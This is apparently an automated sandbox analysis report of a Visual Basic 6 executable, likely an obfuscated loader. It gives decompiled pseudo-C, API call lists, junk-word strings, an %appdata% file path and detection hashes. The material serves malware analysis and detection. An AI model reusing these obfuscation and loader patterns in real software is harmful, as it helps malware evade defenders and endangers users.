__vbaStrMove.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420262
__vbaFreeStr.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042026A
__vbaFreeVar.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420272
__vbaFreeStr.MSVBVM60(004202FA,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 004202C5
__vbaFreeStr.MSVBVM60(004202FA,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 004202CD
__vbaFreeStr.MSVBVM60(004202FA,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 004202D5
__vbaAryDestruct.MSVBVM60(00000000,?,004202FA,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 004202EC
__vbaFreeStr.MSVBVM60(00000000,?,004202FA,?,?,?,?,004025B0,00000002,?,?,?,?,00401546), ref: 004202F4

Strings

Jiggerens, xrefs: 0041FDAA
UNINTERMITTEDLY, xrefs: 0041FFD8
PREHISTORICS, xrefs: 0041FE46
MINESTRYGNING, xrefs: 00420056
2:2:2, xrefs: 00420067
Rappees, xrefs: 0041FDA5
:, xrefs: 0041FFC4
BESMUDSES, xrefs: 0042023F
Suppositoriets, xrefs: 00420177

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#696$#648List$#628CheckHresult$#513#514#522#525#537#541#593#651#652#670#692#702ChkstkConstruct2CopyDestructNew2
String ID: 2:2:2$:$BESMUDSES$Jiggerens$MINESTRYGNING$PREHISTORICS$Rappees$Suppositoriets$UNINTERMITTEDLY
API String ID: 2160480785-2797486545
Opcode ID: 9a1b4819fd14fec164ebd8d3d08cd776f87e8bf1dda14c58956acf41bbfd0f09
Instruction ID: e05a448a9fe77b45811d47edf6050266dc9c57ed9225bdad43217c79e79079f4
Opcode Fuzzy Hash: 9a1b4819fd14fec164ebd8d3d08cd776f87e8bf1dda14c58956acf41bbfd0f09
Instruction Fuzzy Hash: C8026D71940218ABDB15EBA0CC96FEDB7B8BF05304F10856FE105BB1E2EB789A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA9C, Relevance: 71.9, APIs: 33, Strings: 8, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0041DA9C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _v44;
				void* _v48;
				char _v64;
				char _v80;
				char _v96;
				char* _v104;
				char _v112;
				char* _v120;
				char _v128;
				void* _v148;
				short _v152;
				signed int _v156;
				intOrPtr* _v160;
				signed int _v164;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				short _t78;
				signed int _t79;
				char* _t83;
				char* _t88;
				signed int _t99;
				signed int _t104;
				intOrPtr _t132;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t132;
				L00401540();
				_v12 = _t132;
				_v8 = 0x401270;
				_push(L"Scopiformly9");
				_push(L"baadene");
				_push( &_v64); // executed
				L00401732(); // executed
				_v104 = L"Ambulancesagen2";
				_v112 = 0x8008;
				_push( &_v64);
				_t78 =  &_v112;
				_push(_t78);
				L00401738();
				_v152 = _t78;
				L00401828();
				_t79 = _v152;
				if(_t79 != 0) {
					_push(0x1b);
					_push(L"Reklamekampagne4");
					L00401750();
					L0040183A();
					if( *0x4223c0 != 0) {
						_v172 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40258c);
						L004017CE();
						_v172 = 0x4223c0;
					}
					_v152 =  *_v172;
					_t99 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v48);
					asm("fclex");
					_v156 = _t99;
					if(_v156 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40257c);
						_push(_v152);
						_push(_v156);
						L004017C8();
						_v176 = _t99;
					}
					_v160 = _v48;
					_t104 =  *((intOrPtr*)( *_v160 + 0x118))(_v160,  &_v148);
					asm("fclex");
					_v164 = _t104;
					if(_v164 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x118);
						_push(0x40259c);
						_push(_v160);
						_push(_v164);
						L004017C8();
						_v180 = _t104;
					}
					_t79 = _v148;
					_v40 = _t79;
					L004017C2();
				}
				L004017B6();
				_push(0x44);
				_push(_v36);
				L00401750();
				L0040183A();
				_push(_t79);
				_push(L"Jordfstedes4");
				L0040172C();
				asm("sbb eax, eax");
				_v152 =  ~( ~( ~_t79));
				L00401846();
				_t83 = _v152;
				if(_t83 != 0) {
					_v104 = L"appdata";
					_v112 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L0040171A();
					_v120 = L"\\XvFu5flZcgudIlwvVLtjOx372";
					_v128 = 8;
					_push( &_v80);
					_push( &_v128);
					_t88 =  &_v96;
					_push(_t88);
					L00401720();
					_push(_t88);
					L00401834();
					L0040183A();
					_push(_t88);
					_push(1);
					_push(0xffffffff);
					_push(0x120);
					L00401726();
					L00401846();
					_push( &_v96);
					_push( &_v80);
					_push( &_v64);
					_push(3);
					L00401840();
					_push(1);
					_push( &_v32);
					_push(0);
					L00401714();
					_push(1);
					L0040170E();
					_push(0xec);
					_push( &_v64);
					L00401708();
					_t83 =  &_v64;
					_push(_t83);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(0x41dd88);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t83;
			}

0x0041daa1
0x0041daac
0x0041daad
0x0041dab9
0x0041dac1
0x0041dac4
0x0041dacb
0x0041dad0
0x0041dad8
0x0041dad9
0x0041dade
0x0041dae5
0x0041daef
0x0041daf0
0x0041daf3
0x0041daf4
0x0041daf9
0x0041db03
0x0041db08
0x0041db11
0x0041db17
0x0041db19
0x0041db1e
0x0041db28
0x0041db34
0x0041db51
0x0041db36
0x0041db36
0x0041db3b
0x0041db40
0x0041db45
0x0041db45
0x0041db63
0x0041db7b
0x0041db7e
0x0041db80
0x0041db8d
0x0041dbaf
0x0041db8f
0x0041db8f
0x0041db91
0x0041db96
0x0041db9c
0x0041dba2
0x0041dba7
0x0041dba7
0x0041dbb9
0x0041dbd4
0x0041dbda
0x0041dbdc
0x0041dbe9
0x0041dc0e
0x0041dbeb
0x0041dbeb
0x0041dbf0
0x0041dbf5
0x0041dbfb
0x0041dc01
0x0041dc06
0x0041dc06
0x0041dc15
0x0041dc1c
0x0041dc23
0x0041dc23
0x0041dc30
0x0041dc35
0x0041dc37
0x0041dc3a
0x0041dc44
0x0041dc49
0x0041dc4a
0x0041dc4f
0x0041dc56
0x0041dc5c
0x0041dc66
0x0041dc6b
0x0041dc74
0x0041dc7a
0x0041dc81
0x0041dc8e
0x0041dc96
0x0041dc9a
0x0041dc9b
0x0041dca0
0x0041dca7
0x0041dcb1
0x0041dcb5
0x0041dcb6
0x0041dcb9
0x0041dcba
0x0041dcbf
0x0041dcc0
0x0041dcca
0x0041dccf
0x0041dcd0
0x0041dcd2
0x0041dcd4
0x0041dcd9
0x0041dce1
0x0041dce9
0x0041dced
0x0041dcf1
0x0041dcf2
0x0041dcf4
0x0041dcfc
0x0041dd01
0x0041dd02
0x0041dd04
0x0041dd09
0x0041dd0b
0x0041dd10
0x0041dd18
0x0041dd19
0x0041dd1e
0x0041dd21
0x0041dd22
0x0041dd2c
0x0041dd34
0x0041dd34
0x0041dd39
0x0041dd6a
0x0041dd72
0x0041dd7a
0x0041dd82
0x0041dd87

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041DAB9
#692.MSVBVM60(?,baadene,Scopiformly9,?,?,?,?,00401546), ref: 0041DAD9
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0041DAF4
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0041DB03
#618.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041DB1E
__vbaStrMove.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041DB28
__vbaNew2.MSVBVM60(0040258C,004223C0,Reklamekampagne4,0000001B,00008008,?), ref: 0041DB40
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DBA2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,00000118,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DC01
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4,0000001B,00008008), ref: 0041DC23
__vbaStrCopy.MSVBVM60(00008008,?), ref: 0041DC30
#618.MSVBVM60(?,00000044,00008008,?), ref: 0041DC3A
__vbaStrMove.MSVBVM60(?,00000044,00008008,?), ref: 0041DC44
__vbaStrCmp.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DC4F
__vbaFreeStr.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DC66
__vbaVarDup.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DC8E
#666.MSVBVM60(?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DC9B
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DCBA
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DCC0
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DCCA
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DCD9
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DCE1
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000), ref: 0041DCF4
__vbaGet3.MSVBVM60(00000000,?,00000001), ref: 0041DD04
__vbaFileClose.MSVBVM60(00000001,00000000,?,00000001), ref: 0041DD0B
#526.MSVBVM60(?,000000EC,00000001,00000000,?,00000001), ref: 0041DD19
__vbaStrVarMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DD22
__vbaStrMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DD2C
__vbaFreeVar.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DD34
__vbaFreeStr.MSVBVM60(0041DD88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DD6A
__vbaFreeStr.MSVBVM60(0041DD88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DD72
__vbaFreeStr.MSVBVM60(0041DD88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DD7A
__vbaFreeStr.MSVBVM60(0041DD88,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DD82

Strings

Jordfstedes4, xrefs: 0041DC4A
CONTINUATOR, xrefs: 0041DC28
baadene, xrefs: 0041DAD0
\XvFu5flZcgudIlwvVLtjOx372, xrefs: 0041DCA0
appdata, xrefs: 0041DC7A
Ambulancesagen2, xrefs: 0041DADE
Reklamekampagne4, xrefs: 0041DB19
Scopiformly9, xrefs: 0041DACB

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#618CheckFileHresult$#526#666#692ChkstkCloseCopyGet3ListNew2Open
String ID: Ambulancesagen2$CONTINUATOR$Jordfstedes4$Reklamekampagne4$Scopiformly9$\XvFu5flZcgudIlwvVLtjOx372$appdata$baadene
API String ID: 3805544571-2284846736
Opcode ID: 5fca4d9844be23f74f42e20ccd9dd83d0b353054252d5fa202b77e02b400e416
Instruction ID: cafa92f8c2581aca575d317039719a458be0c6de6e9bd63d9c3b4cb87a51cd39
Opcode Fuzzy Hash: 5fca4d9844be23f74f42e20ccd9dd83d0b353054252d5fa202b77e02b400e416
Instruction Fuzzy Hash: C7710B71D00218AADB14EBA1CD46FDEB7B8AF04704F50817AF109B71E2DB785A45CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00420484, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 307
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00420484(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _v52;
				char _v56;
				void* _v60;
				intOrPtr _v68;
				char _v76;
				char _v92;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v132;
				intOrPtr _v140;
				char* _v148;
				char _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				intOrPtr* _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _t182;
				signed int _t207;
				char* _t208;
				signed int _t219;
				char* _t221;
				signed int _t223;
				signed int _t229;
				void* _t231;
				signed int _t234;
				char* _t239;
				void* _t246;
				void* _t248;
				void* _t250;
				void* _t252;
				void* _t254;
				void* _t259;
				void* _t261;
				void* _t263;
				void* _t273;
				void* _t282;
				void* _t284;
				intOrPtr _t285;
				void* _t286;

				_t285 = _t284 - 0x18;
				 *[fs:0x0] = _t285;
				L00401540();
				_v28 = _t285;
				_v24 = 0x4013f0;
				_v20 = 0;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t282);
				_v8 = 1;
				_v8 = 2;
				_v68 = 0x4fdf6b;
				_v76 = 3;
				_push( &_v76);
				_push( &_v92);
				L0040160C();
				_push( &_v92);
				_push( &_v108);
				L004016BA();
				_v148 = L"FOSTERET";
				_v156 = 0x8008;
				_push( &_v108);
				_t182 =  &_v156;
				_push(_t182);
				L004016AE();
				_v160 = _t182;
				_push( &_v108);
				_push( &_v92);
				_push( &_v76);
				_push(3);
				L00401840();
				_t286 = _t285 + 0x10;
				if(_v160 != 0) {
					_v8 = 3;
					if( *0x4223c0 != 0) {
						_v196 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40258c);
						L004017CE();
						_v196 = 0x4223c0;
					}
					_v160 =  *_v196;
					_t229 =  *((intOrPtr*)( *_v160 + 0x14))(_v160,  &_v60);
					asm("fclex");
					_v164 = _t229;
					if(_v164 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40257c);
						_push(_v160);
						_push(_v164);
						L004017C8();
						_v200 = _t229;
					}
					_v168 = _v60;
					_v132 = 0x80020004;
					_v140 = 0xa;
					_t231 = 0x10;
					L00401540();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004016B4();
					L0040183A();
					_t234 =  *((intOrPtr*)( *_v168 + 0x13c))(_v168, _t231, 0x5e4c2e);
					asm("fclex");
					_v172 = _t234;
					if(_v172 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x40259c);
						_push(_v168);
						_push(_v172);
						L004017C8();
						_v204 = _t234;
					}
					L00401846();
					L004017C2();
					_v8 = 4;
					_v68 = 0x16;
					_v76 = 2;
					_push( &_v76);
					_push( &_v92);
					L00401606();
					_v100 = 0xb8;
					_v108 = 2;
					_push( &_v108);
					_push(0xa1);
					_push( &_v92);
					_t239 =  &_v56;
					_push(_t239);
					L00401858();
					_push(_t239);
					L004016A2();
					L0040183A();
					L00401846();
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_push(3);
					L00401840();
					_t286 = _t286 + 0x10;
				}
				_v8 = 6;
				_push(0);
				_push(9);
				_push(1);
				_push(3);
				_push( &_v48);
				_push(4);
				_push(0x80);
				L00401600();
				_v8 = 7;
				 *((intOrPtr*)( *(_v48 + 0xc) + (0 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x27c30;
				_v8 = 8;
				_t246 = 1;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t246 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x94a0c;
				_v8 = 9;
				_t248 = 2;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t248 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x2164a4;
				_v8 = 0xa;
				_t250 = 3;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t250 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x5d9b94;
				_v8 = 0xb;
				_t252 = 4;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t252 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x5a7363;
				_v8 = 0xc;
				_t254 = 5;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t254 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x2787b7;
				_v8 = 0xd;
				_v68 =  *0x40146c;
				_v76 = 4;
				_push( &_v92);
				_t207 =  &_v76;
				_push(_t207);
				L004017A4();
				_v160 = _t207;
				if(_v160 >= 0) {
					_v208 = _v208 & 0x00000000;
				} else {
					_push(_v160);
					L0040179E();
					_v208 = _t207;
				}
				_t208 =  &_v92;
				_push(_t208);
				L0040178C();
				_t273 = 6;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t273 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = _t208;
				_push( &_v92);
				_push( &_v76);
				_push(2);
				L00401840();
				_v8 = 0xe;
				_t259 = 7;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t259 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x37e4a9;
				_v8 = 0xf;
				_t261 = 8;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t261 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x84c244;
				_v8 = 0x10;
				_t263 = 9;
				_t219 =  *(_v48 + 0xc);
				 *((intOrPtr*)(_t219 + (_t263 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x635cea;
				_v8 = 0x11;
				if((_t219 | 0xffffffff) != 0) {
					_v8 = 0x12;
					_v44 = 0x29c1aa;
					_v8 = 0x13;
					_t223 = _v44 ^ 0x0018dd5b;
					_v44 = _t223;
					_v8 = 0x14;
					_push(0xffffffff);
					L004016E4();
					_v8 = 0x15;
					_push(0x3ed0fd);
					L004016B4();
					L0040183A();
					_push(_t223); // executed
					L004015FA(); // executed
					_v40 = _t223;
					L00401846();
				}
				asm("wait");
				_push(0x420948);
				_t221 =  &_v48;
				_push(_t221);
				_push(0);
				L0040173E();
				L00401846();
				return _t221;
			}

0x00420487
0x00420496
0x004204a2
0x004204aa
0x004204ad
0x004204b4
0x004204bb
0x004204ca
0x004204cd
0x004204d4
0x004204db
0x004204e2
0x004204ec
0x004204f0
0x004204f1
0x004204f9
0x004204fd
0x004204fe
0x00420503
0x0042050d
0x0042051a
0x0042051b
0x00420521
0x00420522
0x00420527
0x00420531
0x00420535
0x00420539
0x0042053a
0x0042053c
0x00420541
0x0042054d
0x00420553
0x00420561
0x0042057e
0x00420563
0x00420563
0x00420568
0x0042056d
0x00420572
0x00420572
0x00420590
0x004205a8
0x004205ab
0x004205ad
0x004205ba
0x004205dc
0x004205bc
0x004205bc
0x004205be
0x004205c3
0x004205c9
0x004205cf
0x004205d4
0x004205d4
0x004205e6
0x004205ec
0x004205f3
0x004205ff
0x00420600
0x0042060d
0x0042060e
0x0042060f
0x00420610
0x00420616
0x00420620
0x00420634
0x0042063a
0x0042063c
0x00420649
0x0042066e
0x0042064b
0x0042064b
0x00420650
0x00420655
0x0042065b
0x00420661
0x00420666
0x00420666
0x00420678
0x00420680
0x00420685
0x0042068c
0x00420693
0x0042069d
0x004206a1
0x004206a2
0x004206a7
0x004206ae
0x004206b8
0x004206b9
0x004206c1
0x004206c2
0x004206c5
0x004206c6
0x004206cb
0x004206cc
0x004206d6
0x004206de
0x004206e6
0x004206ea
0x004206ee
0x004206ef
0x004206f1
0x004206f6
0x004206f6
0x004206f9
0x00420700
0x00420702
0x00420704
0x00420706
0x0042070b
0x0042070c
0x0042070e
0x00420713
0x0042071b
0x00420730
0x00420737
0x00420743
0x0042074d
0x00420754
0x00420760
0x0042076a
0x00420771
0x0042077d
0x00420787
0x0042078e
0x0042079a
0x004207a4
0x004207ab
0x004207b7
0x004207c1
0x004207c8
0x004207d5
0x004207d8
0x004207e2
0x004207e3
0x004207e6
0x004207e7
0x004207ec
0x004207f9
0x0042080e
0x004207fb
0x004207fb
0x00420801
0x00420806
0x00420806
0x00420815
0x00420818
0x00420819
0x00420823
0x0042082d
0x00420833
0x00420837
0x00420838
0x0042083a
0x00420842
0x0042084e
0x00420858
0x0042085f
0x0042086b
0x00420875
0x0042087c
0x00420888
0x0042088f
0x00420892
0x00420899
0x004208a5
0x004208a7
0x004208ae
0x004208b5
0x004208bf
0x004208c4
0x004208c7
0x004208ce
0x004208d0
0x004208d5
0x004208dc
0x004208e1
0x004208eb
0x004208f0
0x004208f1
0x004208f6
0x004208fc
0x004208fc
0x00420901
0x00420902
0x00420934
0x00420937
0x00420938
0x0042093a
0x00420942
0x00420947

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 004204A2
#575.MSVBVM60(?,00000003), ref: 004204F1
#518.MSVBVM60(?,?,?,00000003), ref: 004204FE
__vbaVarTstLt.MSVBVM60(00008008,?), ref: 00420522
__vbaFreeVarList.MSVBVM60(00000003,00000003,?,?,00008008,?), ref: 0042053C
__vbaNew2.MSVBVM60(0040258C,004223C0,?,?,?,00401546), ref: 0042056D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014), ref: 004205CF
__vbaChkstk.MSVBVM60(00000000,?,0040257C,00000014), ref: 00420600
__vbaStrI4.MSVBVM60(005E4C2E), ref: 00420616
__vbaStrMove.MSVBVM60(005E4C2E), ref: 00420620
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,0000013C), ref: 00420661
__vbaFreeStr.MSVBVM60(00000000,?,0040259C,0000013C), ref: 00420678
__vbaFreeObj.MSVBVM60(00000000,?,0040259C,0000013C), ref: 00420680
#573.MSVBVM60(?,00000002), ref: 004206A2
__vbaStrVarVal.MSVBVM60(?,?,000000A1,00000002,?,00000002), ref: 004206C6
#628.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004206CC
__vbaStrMove.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004206D6
__vbaFreeStr.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004206DE
__vbaFreeVarList.MSVBVM60(00000003,00000002,?,00000002,00000000,?,?,000000A1,00000002,?,00000002), ref: 004206F1
__vbaRedim.MSVBVM60(00000080,00000004,00000000,00000003,00000001,00000009,00000000,?,?,?,00401546), ref: 00420713
#564.MSVBVM60(00000004,?), ref: 004207E7
__vbaHresultCheck.MSVBVM60(00000000), ref: 00420801
__vbaI4Var.MSVBVM60(?), ref: 00420819
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?), ref: 0042083A
__vbaOnError.MSVBVM60(000000FF), ref: 004208D0
__vbaStrI4.MSVBVM60(003ED0FD,000000FF), ref: 004208E1
__vbaStrMove.MSVBVM60(003ED0FD,000000FF), ref: 004208EB
#578.MSVBVM60(00000000,003ED0FD,000000FF), ref: 004208F1
__vbaFreeStr.MSVBVM60(00000000,003ED0FD,000000FF), ref: 004208FC
__vbaAryDestruct.MSVBVM60(00000000,?,00420948), ref: 0042093A
__vbaFreeStr.MSVBVM60(00000000,?,00420948), ref: 00420942

Strings

FOSTERET, xrefs: 00420503

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultListMove$Chkstk$#518#564#573#575#578#628DestructErrorNew2Redim
String ID: FOSTERET
API String ID: 53557705-1574993597
Opcode ID: 3b3e72e5f0afa7fdbdba26bf733167622dc5863ba2c83933160a41d4ae04be56
Instruction ID: ec8836b000943781542c44480d32d978310ad4f9213c9eeab0408e46e022b369
Opcode Fuzzy Hash: 3b3e72e5f0afa7fdbdba26bf733167622dc5863ba2c83933160a41d4ae04be56
Instruction Fuzzy Hash: E9D1F8B5900218EFDB10EFA4D985FCDBBB4BF08314F10819AE505BB292DB799A44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0041E86D, Relevance: 40.3, APIs: 18, Strings: 5, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0041E86D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v52;
				char* _v76;
				intOrPtr _v84;
				signed int _v108;
				char _v116;
				short _v120;
				char* _t30;
				char* _t33;
				short _t34;
				short _t35;
				intOrPtr _t56;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t56;
				_push(0x68);
				L00401540();
				_v12 = _t56;
				_v8 = 0x401310;
				L004017B6();
				_push(0);
				_push(L"Scripting.FileSystemObject");
				_push( &_v52); // executed
				L004016F0(); // executed
				_t30 =  &_v52;
				_push(_t30);
				L004016F6();
				_push(_t30);
				_push( &_v28);
				L004016FC();
				L00401828();
				_v76 = L"Gulsoterne";
				_v84 = 8;
				_v108 = _v108 & 0x00000000;
				_v116 = 0x8002;
				_push(0x10);
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(1);
				_push(L"FolderExists");
				_push(_v28);
				_t33 =  &_v52;
				_push(_t33); // executed
				L004016EA(); // executed
				_push(_t33);
				_t34 =  &_v116;
				_push(_t34);
				L00401738();
				_v120 = _t34;
				L00401828();
				_t35 = _v120;
				if(_t35 != 0) {
					_push(0x9ae);
					L0040169C();
					L0040183A();
					_push(L"Propreste7");
					_push(L"Desorganisationens");
					L00401696();
					L0040183A();
				}
				_push(0x41e996);
				L00401846();
				L004017C2();
				L00401846();
				L00401846();
				return _t35;
			}

0x0041e872
0x0041e87d
0x0041e87e
0x0041e885
0x0041e888
0x0041e890
0x0041e893
0x0041e8a0
0x0041e8a5
0x0041e8a7
0x0041e8af
0x0041e8b0
0x0041e8b5
0x0041e8b8
0x0041e8b9
0x0041e8be
0x0041e8c2
0x0041e8c3
0x0041e8cb
0x0041e8d0
0x0041e8d7
0x0041e8de
0x0041e8e2
0x0041e8e9
0x0041e8ec
0x0041e8f6
0x0041e8f7
0x0041e8f8
0x0041e8f9
0x0041e8fa
0x0041e8fc
0x0041e901
0x0041e904
0x0041e907
0x0041e908
0x0041e910
0x0041e911
0x0041e914
0x0041e915
0x0041e91a
0x0041e921
0x0041e926
0x0041e92c
0x0041e92e
0x0041e933
0x0041e93d
0x0041e942
0x0041e947
0x0041e94c
0x0041e956
0x0041e956
0x0041e95b
0x0041e978
0x0041e980
0x0041e988
0x0041e990
0x0041e995

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041E888
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041E8A0
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E8B0
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E8B9
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E8C3
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041E8CB
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E8EC
__vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001), ref: 0041E908
__vbaVarTstNe.MSVBVM60(?,00000000), ref: 0041E915
__vbaFreeVar.MSVBVM60(?,00000000), ref: 0041E921
#697.MSVBVM60(000009AE,?,00000000), ref: 0041E933
__vbaStrMove.MSVBVM60(000009AE,?,00000000), ref: 0041E93D
__vbaStrCat.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041E94C
__vbaStrMove.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041E956
__vbaFreeStr.MSVBVM60(0041E996,?,00000000), ref: 0041E978
__vbaFreeObj.MSVBVM60(0041E996,?,00000000), ref: 0041E980
